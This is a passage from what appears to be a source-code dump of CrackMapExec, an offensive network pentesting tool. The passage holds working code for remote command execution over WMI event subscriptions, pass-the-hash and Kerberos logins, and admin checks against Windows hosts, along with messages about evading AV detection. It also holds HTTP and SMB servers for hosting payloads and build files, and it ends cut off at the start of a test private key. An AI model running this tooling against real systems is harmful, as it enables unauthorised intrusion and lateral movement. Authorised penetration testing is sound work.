IntervalTimerInstruction.TimerId=\"{self.__instanceID}\"', resp.GetCallStatus(0) & 0xffffffff)\n\n # EventFilter\n eventFilter,_ = self.__iWbemServices.GetObject('__EventFilter')\n eventFilter = eventFilter.SpawnInstance()\n eventFilter.Name = self.__instanceID\n eventFilter.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0]\n eventFilter.Query = f'select * from __TimerEvent where TimerID = \"{self.__instanceID}\" '\n eventFilter.QueryLanguage = 'WQL'\n eventFilter.EventNamespace = r'root\\subscription'\n # Don't output verbose\n current=sys.stdout\n sys.stdout = StringIO()\n resp = self.__iWbemServices.PutInstance(eventFilter.marshalMe())\n sys.stdout = current\n self.checkError(f'Adding EventFilter.Name={self.__instanceID}\"', resp.GetCallStatus(0) & 0xffffffff)\n\n # Binding EventFilter & EventConsumer\n filterBinding, _ = self.__iWbemServices.GetObject('__FilterToConsumerBinding')\n filterBinding = filterBinding.SpawnInstance()\n filterBinding.Filter = f'__EventFilter.Name=\"{self.__instanceID}\"'\n filterBinding.Consumer = f'ActiveScriptEventConsumer.Name=\"{self.__instanceID}\"'\n filterBinding.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0]\n # Don't output verbose\n current=sys.stdout\n sys.stdout = StringIO()\n resp = self.__iWbemServices.PutInstance(filterBinding.marshalMe())\n sys.stdout = current\n self.checkError(fr'Adding FilterToConsumerBinding.Consumer=\"ActiveScriptEventConsumer.Name=\\\"{self.__instanceID}\\\"\", Filter=\"__EventFilter.Name=\\\"{self.__instanceID}\\\"\"', resp.GetCallStatus(0) & 0xffffffff)\n\n def get_CommandResult(self):\n try:\n command_ResultObject, _ = self.__iWbemServices.GetObject(f'ActiveScriptEventConsumer.Name=\"{self.__instanceID_StoreResult}\"')\n record = dict(command_ResultObject.getProperties())\n self.__outputBuffer = base64.b64decode(record['ScriptText']['value']).decode(self.__codec, errors='replace')\n except Exception as e:\n self.logger.fail(f'WMIEXEC-EVENT: Get output file error, maybe command not executed successfully or got detected by AV software, please increase the interval time of command execution with \"--interval-time\" option. If it\\'s still failing maybe something is blocking the schedule job in vbscript, try another exec method')\n\n def remove_Instance(self):\n if self.__retOutput:\n resp = self.__iWbemServices.DeleteInstance(f'ActiveScriptEventConsumer.Name=\"{self.__instanceID_StoreResult}\"')\n self.checkError(f'Removing ActiveScriptEventConsumer.Name=\"{self.__instanceID}\"', resp.GetCallStatus(0) & 0xffffffff)\n\n resp = self.__iWbemServices.DeleteInstance(f'ActiveScriptEventConsumer.Name=\"{self.__instanceID}\"')\n self.checkError(f'Removing ActiveScriptEventConsumer.Name=\"{self.__instanceID}\"', resp.GetCallStatus(0) & 0xffffffff)\n\n resp = self.__iWbemServices.DeleteInstance(f'__IntervalTimerInstruction.TimerId=\"{self.__instanceID}\"')\n self.checkError(f'Removing IntervalTimerInstruction.TimerId=\"{self.__instanceID}\"', resp.GetCallStatus(0) & 0xffffffff)\n\n resp = self.__iWbemServices.DeleteInstance(f'__EventFilter.Name=\"{self.__instanceID}\"')\n self.checkError(f'Removing EventFilter.Name=\"{self.__instanceID}\"', resp.GetCallStatus(0) & 0xffffffff)\n\n resp = self.__iWbemServices.DeleteInstance(fr'__FilterToConsumerBinding.Consumer=\"ActiveScriptEventConsumer.Name=\\\"{self.__instanceID}\\\"\",Filter=\"__EventFilter.Name=\\\"{self.__instanceID}\\\"\"')\n self.checkError(fr'Removing FilterToConsumerBinding.Consumer=\"ActiveScriptEventConsumer.Name=\\\"{self.__instanceID}\\\"\", Filter=\"__EventFilter.Name=\\\"{self.__instanceID}\\\"\"', resp.GetCallStatus(0) & 0xffffffff)" }, { "path": "cme/protocols/wmi.py", "content": "import os, struct, logging\n\nfrom io import StringIO\nfrom six import indexbytes\nfrom datetime import datetime\nfrom cme.config import process_secret\nfrom cme.connection import *\nfrom cme.logger import CMEAdapter\nfrom cme.protocols.wmi import wmiexec, wmiexec_event\n\nfrom impacket import ntlm\nfrom impacket.uuid import uuidtup_to_bin\nfrom impacket.krb5.ccache import CCache\nfrom impacket.dcerpc.v5.dtypes import NULL\nfrom impacket.dcerpc.v5 import transport, epm\nfrom impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, MSRPC_BIND, MSRPCBind, CtxItem, MSRPCHeader, SEC_TRAILER, MSRPCBindAck\nfrom impacket.dcerpc.v5.dcomrt import DCOMConnection\nfrom impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, WBEM_FLAG_FORWARD_ONLY, IWbemLevel1Login\n\nMSRPC_UUID_PORTMAP = uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA', '3.0'))\n\nclass wmi(connection):\n\n def __init__(self, args, db, host):\n self.domain = None\n self.hash = ''\n self.lmhash = ''\n self.nthash = ''\n self.fqdn = ''\n self.remoteName = ''\n self.server_os = None\n self.doKerberos = False\n self.stringBinding = None\n # From: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/18d8fbe8-a967-4f1c-ae50-99ca8e491d2d\n self.rpc_error_status = {\n \"0000052F\" : \"STATUS_ACCOUNT_RESTRICTION\",\n \"00000533\" : \"STATUS_ACCOUNT_DISABLED\",\n \"00000775\" : \"STATUS_ACCOUNT_LOCKED_OUT\",\n \"00000701\" : \"STATUS_ACCOUNT_EXPIRED\",\n \"00000532\" : \"STATUS_PASSWORD_EXPIRED\",\n \"00000530\" : \"STATUS_INVALID_LOGON_HOURS\",\n \"00000531\" : \"STATUS_INVALID_WORKSTATION\",\n \"00000569\" : \"STATUS_LOGON_TYPE_NOT_GRANTED\",\n \"00000773\" : \"STATUS_PASSWORD_MUST_CHANGE\",\n \"00000005\" : \"STATUS_ACCESS_DENIED\",\n \"0000052E\" : \"STATUS_LOGON_FAILURE\",\n \"0000052B\" : \"STATUS_WRONG_PASSWORD\",\n \"00000721\" : \"RPC_S_SEC_PKG_ERROR\"\n }\n\n connection.__init__(self, args, db, host)\n\n def proto_logger(self):\n self.logger = CMEAdapter(extra={'protocol': 'WMI',\n 'host': self.host,\n 'port': self.args.port,\n 'hostname': self.hostname})\n \n def create_conn_obj(self):\n if self.remoteName == '':\n self.remoteName = self.host\n try:\n rpctansport = transport.DCERPCTransportFactory(r'ncacn_ip_tcp:{0}[{1}]'.format(self.remoteName, str(self.args.port)))\n rpctansport.set_credentials(username=\"\", password=\"\", domain=\"\", lmhash=\"\", nthash=\"\", aesKey=\"\")\n rpctansport.setRemoteHost(self.host)\n rpctansport.set_connect_timeout(self.args.rpc_timeout)\n dce = rpctansport.get_dce_rpc()\n dce.set_auth_type(RPC_C_AUTHN_WINNT)\n dce.connect()\n dce.bind(MSRPC_UUID_PORTMAP)\n dce.disconnect()\n except Exception as e:\n self.logger.debug(str(e))\n return False\n else:\n self.conn = rpctansport\n return True\n \n def enum_host_info(self):\n # All code pick from DumpNTLNInfo.py\n # https://github.com/fortra/impacket/blob/master/examples/DumpNTLMInfo.py\n ntlmChallenge = None\n \n bind = MSRPCBind()\n item = CtxItem()\n item['AbstractSyntax'] = epm.MSRPC_UUID_PORTMAP\n item['TransferSyntax'] = uuidtup_to_bin(('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))\n item['ContextID'] = 0\n item['TransItems'] = 1\n bind.addCtxItem(item)\n\n packet = MSRPCHeader()\n packet['type'] = MSRPC_BIND\n packet['pduData'] = bind.getData()\n packet['call_id'] = 1\n\n auth = ntlm.getNTLMSSPType1('', '', signingRequired=True, use_ntlmv2=True)\n sec_trailer = SEC_TRAILER()\n sec_trailer['auth_type'] = RPC_C_AUTHN_WINNT\n sec_trailer['auth_level'] = RPC_C_AUTHN_LEVEL_PKT_INTEGRITY\n sec_trailer['auth_ctx_id'] = 0 + 79231 \n pad = (4 - (len(packet.get_packet()) % 4)) % 4\n if pad != 0:\n packet['pduData'] += b'\\xFF'*pad\n sec_trailer['auth_pad_len']=pad\n packet['sec_trailer'] = sec_trailer\n packet['auth_data'] = auth\n\n try:\n self.conn.connect()\n self.conn.send(packet.get_packet())\n buffer = self.conn.recv()\n except:\n buffer = 0\n\n if buffer != 0:\n response = MSRPCHeader(buffer)\n bindResp = MSRPCBindAck(response.getData())\n\n ntlmChallenge = ntlm.NTLMAuthChallenge(bindResp['auth_data'])\n\n if ntlmChallenge['TargetInfoFields_len'] > 0:\n av_pairs = ntlm.AV_PAIRS(ntlmChallenge['TargetInfoFields'][:ntlmChallenge['TargetInfoFields_len']])\n if av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1] is not None:\n try:\n self.hostname = av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')\n except:\n self.hostname = self.host\n if av_pairs[ntlm.NTLMSSP_AV_DNS_DOMAINNAME][1] is not None:\n try:\n self.domain = av_pairs[ntlm.NTLMSSP_AV_DNS_DOMAINNAME][1].decode('utf-16le')\n except:\n self.domain = self.args.domain\n if av_pairs[ntlm.NTLMSSP_AV_DNS_HOSTNAME][1] is not None:\n try:\n self.fqdn = av_pairs[ntlm.NTLMSSP_AV_DNS_HOSTNAME][1].decode('utf-16le')\n except:\n pass\n if 'Version' in ntlmChallenge.fields:\n version = ntlmChallenge['Version']\n if len(version) >= 4:\n self.server_os = \"Windows NT %d.%d Build %d\" % (indexbytes(version,0), indexbytes(version,1), struct.unpack(' 0:\n self.logger.fail(str(e))\n else:\n if not flag or not self.stringBinding:\n dcom.disconnect()\n error_msg = f'Check admin error: dcom initialization failed with stringbinding: \"{self.stringBinding}\", please try \"--rpc-timeout\" option. (probably is admin)'\n \n if not self.stringBinding:\n error_msg = \"Check admin error: dcom initialization failed: can't get target stringbinding, maybe cause by IPv6 or any other issues, please check your target again\"\n \n self.logger.fail(error_msg) if not flag else self.logger.debug(error_msg)\n else:\n try:\n iWbemLevel1Login = IWbemLevel1Login(iInterface)\n iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)\n except Exception as e:\n dcom.disconnect()\n\n if not str(e).find(\"access_denied\") > 0:\n self.logger.fail(str(e))\n else:\n dcom.disconnect()\n self.logger.extra['protocol'] = \"WMI\"\n self.admin_privs = True\n return\n\n def kerberos_login(self, domain, username, password=\"\", ntlm_hash=\"\", aesKey=\"\", kdcHost=\"\", useCache=False):\n logging.getLogger(\"impacket\").disabled = True\n lmhash = ''\n nthash = ''\n self.password = password\n self.username = username\n self.domain = domain\n self.remoteName = self.fqdn\n self.create_conn_obj()\n \n if password == \"\":\n if ntlm_hash.find(':') != -1:\n lmhash, nthash = ntlm_hash.split(':')\n else:\n nthash = ntlm_hash\n self.nthash = nthash\n self.lmhash = lmhash\n \n if not all(\"\" == s for s in [nthash, password, aesKey]):\n kerb_pass = next(s for s in [nthash, password, aesKey] if s)\n else:\n kerb_pass = \"\"\n \n if useCache:\n if kerb_pass == \"\":\n ccache = CCache.loadFile(os.getenv(\"KRB5CCNAME\"))\n username = ccache.credentials[0].header['client'].prettyPrint().decode().split(\"@\")[0]\n self.username = username\n\n used_ccache = \" from ccache\" if useCache else f\":{process_secret(kerb_pass)}\"\n try:\n self.conn.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash, aesKey=self.aesKey)\n self.conn.set_kerberos(True, kdcHost)\n dce = self.conn.get_dce_rpc()\n dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n dce.connect()\n dce.bind(MSRPC_UUID_PORTMAP)\n except Exception as e:\n dce.disconnect()\n error_msg = str(e).lower()\n self.logger.debug(error_msg)\n if \"unpack requires a buffer of 4 bytes\" in error_msg:\n error_msg = \"Kerberos authentication failure\"\n out = f\"{self.domain}\\\\{self.username}{used_ccache} {error_msg}\"\n self.logger.fail(out)\n elif \"kerberos sessionerror\" in str(e).lower():\n out = f\"{self.domain}\\\\{self.username}{used_ccache} {list(e.getErrorString())[0]}\"\n self.logger.fail(out, color=\"magenta\")\n return False\n else:\n out = f\"{self.domain}\\\\{self.username}{used_ccache} {str(e)}\"\n self.logger.fail(out, color=\"red\")\n return False\n else:\n try:\n # Get data from rpc connection if got vaild creds\n entry_handle = epm.ept_lookup_handle_t()\n request = epm.ept_lookup()\n request['inquiry_type'] = 0x0\n request['object'] = NULL\n request['Ifid'] = NULL\n request['vers_option'] = 0x1\n request['entry_handle'] = entry_handle\n request['max_ents'] = 1\n resp = dce.request(request)\n except Exception as e:\n dce.disconnect()\n error_msg = str(e).lower()\n self.logger.debug(error_msg)\n for code in self.rpc_error_status.keys():\n if code in error_msg:\n error_msg = self.rpc_error_status[code]\n out = f\"{self.domain}\\\\{self.username}{used_ccache} {error_msg.upper()}\"\n self.logger.fail(out, color=(\"red\" if \"access_denied\" in error_msg else \"magenta\"))\n return False\n else:\n self.doKerberos = True\n self.check_if_admin()\n dce.disconnect()\n out = f\"{self.domain}\\\\{self.username}{used_ccache} {self.mark_pwned()}\"\n self.logger.success(out)\n return True\n\n def plaintext_login(self, domain, username, password):\n self.password = password\n self.username = username\n self.domain = domain\n try:\n self.conn.set_credentials(username=self.username, password=self.password, domain=self.domain, lmhash=self.lmhash, nthash=self.nthash)\n dce = self.conn.get_dce_rpc()\n dce.set_auth_type(RPC_C_AUTHN_WINNT)\n dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n dce.connect()\n dce.bind(MSRPC_UUID_PORTMAP)\n except Exception as e:\n dce.disconnect()\n self.logger.debug(str(e))\n out = f\"{self.domain}\\\\{self.username}:{process_secret(self.password)} {str(e)}\"\n self.logger.fail(out, color=\"red\")\n else:\n try:\n # Get data from rpc connection if got vaild creds\n entry_handle = epm.ept_lookup_handle_t()\n request = epm.ept_lookup()\n request['inquiry_type'] = 0x0\n request['object'] = NULL\n request['Ifid'] = NULL\n request['vers_option'] = 0x1\n request['entry_handle'] = entry_handle\n request['max_ents'] = 1\n resp = dce.request(request)\n except Exception as e:\n dce.disconnect()\n error_msg = str(e).lower()\n self.logger.debug(error_msg)\n for code in self.rpc_error_status.keys():\n if code in error_msg:\n error_msg = self.rpc_error_status[code]\n self.logger.fail((f\"{self.domain}\\\\{self.username}:{process_secret(self.password)} ({error_msg.upper()})\"), color=(\"red\" if \"access_denied\" in error_msg else \"magenta\"))\n return False\n else:\n self.check_if_admin()\n dce.disconnect()\n out = f\"{domain}\\\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}\"\n if self.username == \"\" and self.password == \"\":\n out += \"(Default allow anonymous login)\"\n self.logger.success(out)\n return True\n \n def hash_login(self, domain, username, ntlm_hash):\n self.username = username\n lmhash = ''\n nthash = ''\n if ntlm_hash.find(':') != -1:\n self.lmhash, self.nthash = ntlm_hash.split(':')\n else:\n lmhash = ''\n nthash = ntlm_hash\n \n self.nthash = nthash\n self.lmhash = lmhash\n \n try:\n self.conn.set_credentials(username=self.username, password=self.password, domain=self.domain, lmhash=lmhash, nthash=nthash)\n dce = self.conn.get_dce_rpc()\n dce.set_auth_type(RPC_C_AUTHN_WINNT)\n dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n dce.connect()\n dce.bind(MSRPC_UUID_PORTMAP)\n except Exception as e:\n dce.disconnect()\n self.logger.debug(str(e))\n out = f\"{domain}\\\\{self.username}:{process_secret(self.nthash)} {str(e)}\"\n self.logger.fail(out, color=\"red\")\n else:\n try:\n # Get data from rpc connection if got vaild creds\n entry_handle = epm.ept_lookup_handle_t()\n request = epm.ept_lookup()\n request['inquiry_type'] = 0x0\n request['object'] = NULL\n request['Ifid'] = NULL\n request['vers_option'] = 0x1\n request['entry_handle'] = entry_handle\n request['max_ents'] = 1\n resp = dce.request(request)\n except Exception as e:\n dce.disconnect()\n error_msg = str(e).lower()\n self.logger.debug(error_msg)\n for code in self.rpc_error_status.keys():\n if code in error_msg:\n error_msg = self.rpc_error_status[code]\n self.logger.fail((f\"{self.domain}\\\\{self.username}:{process_secret(self.nthash)} ({error_msg.upper()})\"), color=(\"red\" if \"access_denied\" in error_msg else \"magenta\"))\n return False\n else:\n self.check_if_admin()\n dce.disconnect()\n out = f\"{domain}\\\\{self.username}:{process_secret(self.nthash)} {self.mark_pwned()}\"\n if self.username == \"\" and self.password == \"\":\n out += \"(Default allow anonymous login)\"\n self.logger.success(out)\n return True\n\n # It's very complex to use wmi from rpctansport \"convert\" to dcom, so let we use dcom directly. \n @requires_admin\n def wmi(self, WQL=None, namespace=None):\n results_WQL = \"\\r\"\n records = []\n if not WQL:\n WQL = self.args.wmi.strip('\\n')\n\n if not namespace:\n namespace = self.args.wmi_namespace\n\n try:\n dcom = DCOMConnection(self.conn.getRemoteName(), self.username, self.password, self.domain, self.lmhash, self.nthash, oxidResolver=True, doKerberos=self.doKerberos ,kdcHost=self.kdcHost, aesKey=self.aesKey)\n iInterface = dcom.CoCreateInstanceEx(CLSID_WbemLevel1Login,IID_IWbemLevel1Login)\n iWbemLevel1Login = IWbemLevel1Login(iInterface)\n iWbemServices= iWbemLevel1Login.NTLMLogin(namespace , NULL, NULL)\n iWbemLevel1Login.RemRelease()\n iEnumWbemClassObject = iWbemServices.ExecQuery(WQL)\n except Exception as e:\n dcom.disconnect()\n self.logger.debug(str(e))\n self.logger.fail('Execute WQL error: {}'.format(str(e)))\n return False\n else:\n self.logger.info(f\"Executing WQL syntax: {WQL}\")\n while True:\n try:\n wmi_results = iEnumWbemClassObject.Next(0xffffffff, 1)[0]\n record = wmi_results.getProperties()\n records.append(record)\n for k,v in record.items():\n self.logger.highlight(f\"{k} => {v['value']}\")\n except Exception as e:\n if str(e).find('S_FALSE') < 0:\n self.logger.debug(str(e))\n else:\n break\n\n dcom.disconnect()\n\n return records\n\n @requires_admin\n def execute(self, command=None, get_output=False):\n output = \"\"\n if not command:\n command = self.args.execute\n\n if not self.args.no_output:\n get_output = True\n\n if \"systeminfo\" in command and self.args.interval_time < 10:\n self.logger.fail(\"Execute 'systeminfo' must set the interval time higher than 10 seconds\")\n return False\n \n if self.server_os is not None and \"NT 5\" in self.server_os:\n self.logger.fail(\"Execute command failed, not support current server os (version < NT 6)\")\n return False\n\n if self.args.exec_method == \"wmiexec\":\n exec_method = wmiexec.WMIEXEC(self.conn.getRemoteName(), self.username, self.password, self.domain, self.lmhash, self.nthash, self.doKerberos, self.kdcHost, self.aesKey, self.logger, self.args.interval_time, self.args.codec)\n output = exec_method.execute(command, get_output)\n \n elif self.args.exec_method == \"wmiexec-event\":\n exec_method = wmiexec_event.WMIEXEC_EVENT(self.conn.getRemoteName(), self.username, self.password, self.domain, self.lmhash, self.nthash, self.doKerberos, self.kdcHost, self.aesKey, self.logger, self.args.interval_time, self.args.codec)\n output = exec_method.execute(command, get_output)\n\n self.conn.disconnect()\n if output == \"\" and get_output:\n self.logger.fail(\"Execute command failed, probabaly got detection by AV.\")\n return False\n else:\n self.logger.success(f'Executed command: \"{command}\" via {self.args.exec_method}')\n buf = StringIO(output).readlines()\n for line in buf:\n self.logger.highlight(line.strip())\n return output" }, { "path": "cme/servers/__init__.py", "content": "" }, { "path": "cme/servers/http.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport http.server\nimport threading\nimport ssl\nimport os\nimport sys\nfrom http.server import BaseHTTPRequestHandler\nfrom time import sleep\nfrom cme.helpers.logger import highlight\nfrom cme.logger import CMEAdapter\n\n\nclass RequestHandler(BaseHTTPRequestHandler):\n def log_message(self, format, *args):\n server_logger = CMEAdapter(\n extra={\n \"module_name\": self.server.module.name.upper(),\n \"host\": self.client_address[0],\n }\n )\n server_logger.display(\"- - %s\" % (format % args))\n\n def do_GET(self):\n if hasattr(self.server.module, \"on_request\"):\n server_logger = CMEAdapter(\n extra={\n \"module_name\": self.server.module.name.upper(),\n \"host\": self.client_address[0],\n }\n )\n self.server.context.log = server_logger\n self.server.module.on_request(self.server.context, self)\n\n def do_POST(self):\n if hasattr(self.server.module, \"on_response\"):\n server_logger = CMEAdapter(\n extra={\n \"module_name\": self.server.module.name.upper(),\n \"host\": self.client_address[0],\n }\n )\n self.server.context.log = server_logger\n self.server.module.on_response(self.server.context, self)\n\n def stop_tracking_host(self):\n \"\"\"\n This gets called when a module has finshed executing, removes the host from the connection tracker list\n \"\"\"\n try:\n self.server.hosts.remove(self.client_address[0])\n if hasattr(self.server.module, \"on_shutdown\"):\n self.server.module.on_shutdown(self.server.context, self.server.connection)\n except ValueError:\n pass\n\n\nclass CMEServer(threading.Thread):\n def __init__(self, module, context, logger, srv_host, port, server_type=\"https\"):\n try:\n threading.Thread.__init__(self)\n\n self.server = http.server.HTTPServer((srv_host, int(port)), RequestHandler)\n self.server.hosts = []\n self.server.module = module\n self.server.context = context\n self.server.log = CMEAdapter(extra={\"module_name\": self.server.module.name.upper()})\n self.cert_path = os.path.join(os.path.expanduser(\"~/.cme\"), \"cme.pem\")\n self.server.track_host = self.track_host\n\n logger.debug(\"CME server type: \" + server_type)\n if server_type == \"https\":\n self.server.socket = ssl.wrap_socket(self.server.socket, certfile=self.cert_path, server_side=True)\n\n except Exception as e:\n errno, message = e.args\n if errno == 98 and message == \"Address already in use\":\n logger.error(\"Error starting HTTP(S) server: the port is already in use, try specifying a diffrent port using --server-port\")\n else:\n logger.error(f\"Error starting HTTP(S) server: {message}\")\n\n sys.exit(1)\n\n def base_server(self):\n return self.server\n\n def track_host(self, host_ip):\n self.server.hosts.append(host_ip)\n\n def run(self):\n try:\n self.server.serve_forever()\n except:\n pass\n\n def shutdown(self):\n try:\n while len(self.server.hosts) > 0:\n self.server.log.info(f\"Waiting on {highlight(len(self.server.hosts))} host(s)\")\n sleep(15)\n except KeyboardInterrupt:\n pass\n\n # shut down the server/socket\n self.server.shutdown()\n self.server.socket.close()\n self.server.server_close()\n\n # make sure all the threads are killed\n for thread in threading.enumerate():\n if thread.is_alive():\n try:\n thread._stop()\n except:\n pass\n" }, { "path": "cme/servers/smb.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport threading\nfrom threading import enumerate\nfrom sys import exit\nfrom impacket import smbserver\n\n\nclass CMESMBServer(threading.Thread):\n def __init__(\n self,\n logger,\n share_name,\n share_path=\"/tmp/cme_hosted\",\n listen_address=\"0.0.0.0\",\n listen_port=445,\n verbose=False,\n ):\n try:\n threading.Thread.__init__(self)\n self.server = smbserver.SimpleSMBServer(listen_address, listen_port)\n self.server.addShare(share_name.upper(), share_path)\n if verbose:\n self.server.setLogFile(\"\")\n self.server.setSMB2Support(True)\n self.server.setSMBChallenge(\"\")\n except Exception as e:\n errno, message = e.args\n if errno == 98 and message == \"Address already in use\":\n logger.error(\"Error starting SMB server on port 445: the port is already in use\")\n else:\n logger.error(f\"Error starting SMB server on port 445: {message}\")\n exit(1)\n\n def addShare(self, share_name, share_path):\n self.server.addShare(share_name, share_path)\n\n def run(self):\n try:\n self.server.start()\n except:\n pass\n\n def shutdown(self):\n # TODO: should fine the proper way\n # make sure all the threads are killed\n for thread in enumerate():\n if thread.is_alive():\n try:\n self._stop()\n except:\n pass\n" }, { "path": "crackmapexec.spec", "content": "# -*- mode: python ; coding: utf-8 -*-\n\nblock_cipher = None\n\n\na = Analysis(['./cme/crackmapexec.py'],\n pathex=['./cme'],\n binaries=[],\n datas=[('./cme/protocols', 'cme/protocols'),('./cme/data', 'cme/data'),('./cme/modules', 'cme/modules')],\n hiddenimports=['cme.protocols.mssql.mssqlexec', 'cme.connection', 'impacket.examples.secretsdump', 'impacket.dcerpc.v5.lsat', 'impacket.dcerpc.v5.transport', 'impacket.dcerpc.v5.lsad', 'cme.servers.smb', 'cme.protocols.smb.wmiexec', 'cme.protocols.smb.atexec', 'cme.protocols.smb.smbexec', 'cme.protocols.smb.mmcexec', 'cme.protocols.smb.smbspider', 'cme.protocols.smb.passpol', 'paramiko', 'pypsrp.client', 'pywerview.cli.helpers', 'impacket.tds', 'impacket.version', 'cme.helpers.bash', 'pylnk3', 'lsassy','win32timezone', 'impacket.tds', 'impacket.ldap.ldap', 'impacket.tds'],\n hookspath=['./cme/.hooks'],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n [],\n name='crackmapexec',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n upx_exclude=[],\n runtime_tmpdir=None,\n console=True,\n icon='./cme/data/cme.ico' )\n" }, { "path": "flake.nix", "content": "{\n description = \"Application packaged using poetry2nix\";\n\n inputs.flake-utils.url = \"github:numtide/flake-utils\";\n inputs.nixpkgs.url = \"github:NixOS/nixpkgs\";\n inputs.poetry2nix.url = \"github:nix-community/poetry2nix\";\n\n outputs = { self, nixpkgs, flake-utils, poetry2nix }:\n {\n # Nixpkgs overlay providing the application\n overlay = nixpkgs.lib.composeManyExtensions [\n poetry2nix.overlay\n (final: prev: {\n # The application\n CrackMapExec = prev.poetry2nix.mkPoetryApplication {\n projectDir = ./.;\n };\n })\n ];\n } // (flake-utils.lib.eachDefaultSystem (system:\n let\n pkgs = import nixpkgs {\n inherit system;\n overlays = [ self.overlay ];\n };\n in\n {\n apps = {\n CrackMapExec = pkgs.CrackMapExec;\n };\n\n defaultApp = pkgs.CrackMapExec;\n\n packages = { CrackMapExec = pkgs.CrackMapExec; };\n }));\n}\n" }, { "path": "pyproject.toml", "content": "[tool.poetry]\nname = \"crackmapexec\"\nversion = \"6.1.0\"\ndescription = \"A swiss army knife for pentesting networks\"\nauthors = [\"Marcello Salvati \", \"Martial Puygrenier \"]\nreadme = \"README.md\"\nhomepage = \"https://github.com/mpgn/CrackMapExec\"\nrepository = \"https://github.com/mpgn/CrackMapExec\"\nexclude = []\ninclude = [\"cme/data/*\", \"cme/modules/*\"]\nlicense = \"BSD-2-Clause\"\nclassifiers = [\n 'Environment :: Console',\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python :: 3',\n 'Topic :: Security',\n]\npackages = [\n { include = \"cme\"}\n]\n\n[tool.poetry.scripts]\ncme = 'cme.crackmapexec:main'\ncrackmapexec = 'cme.crackmapexec:main'\ncmedb = 'cme.cmedb:main'\n\n[tool.poetry.dependencies]\npython = \"^3.7.0\"\nrequests = \">=2.27.1\"\nbeautifulsoup4 = \">=4.11,<5\"\nlsassy = \">=3.1.8\"\ntermcolor = \"^1.1.0\"\nmsgpack = \"^1.0.0\"\nneo4j = \"^4.1.1\"\npylnk3 = \"^0.4.2\"\npypsrp = \"^0.7.0\"\nparamiko = \"^2.7.2\"\nimpacket = { git = \"https://github.com/mpgn/impacket.git\", branch = \"gkdi\" }\ndsinternals = \"^1.2.4\"\nxmltodict = \"^0.12.0\"\nterminaltables = \"^3.1.0\"\naioconsole = \"^0.3.3\"\npywerview = \"^0.3.3\"\nminikerberos = \"^0.4.0\"\npypykatz = \"^0.6.8\"\naardwolf = \"^0.2.7\"\ndploot = \"^2.2.1\"\nbloodhound = \"^1.6.1\"\nasyauth = \"~0.0.13\"\nmasky = \"^0.2.0\"\nsqlalchemy = \"^2.0.4\"\naiosqlite = \"^0.18.0\"\npyasn1-modules = \"^0.3.0\"\nrich = \"^13.3.5\"\npython-libnmap = \"^0.7.3\"\nresource = \"^0.2.1\"\noscrypto = { git = \"https://github.com/NeffIsBack/oscrypto\" }\n\n[tool.poetry.group.dev.dependencies]\nflake8 = \"*\"\npylint = \"*\"\nshiv = \"*\"\nblack = \"^20.8b1\"\npytest = \"^7.2.2\"\n\n[build-system]\nrequires = [\"poetry-core>=1.2.0\"]\nbuild-backend = \"poetry.core.masonry.api\"\n" }, { "path": "shell.nix", "content": "{ pkgs ? import {} }:\nlet\n myAppEnv = pkgs.poetry2nix.mkPoetryEnv {\n projectDir = ./.;\n editablePackageSources = {\n my-app = ./src;\n };\n };\nin myAppEnv.env\n" }, { "path": "tests/README.md", "content": "# CME Tests\n## Running Tests\n### Unit Tests\n* Install CME (either in venv or via Poetry)\n* Run `pytest` (or `poetry run pytest`)\n\n### End to End Tests\n* Install CME (either in venv or via Poetry)\n* Run `python tests/e2e_tests.py -t $IP -u $USER -p $PASS`, with optional `-k` parameter\n * Poetry: `poetry run python tests/e2e_tests.py -t $IP -u $USER -p $PASS`\n* To see full errors (that might show real errors not caught by checking the exit code), run with the `--errors` flag" }, { "path": "tests/data/test_key.priv", "content": "-----BEGIN OPENSSH PRIVATE 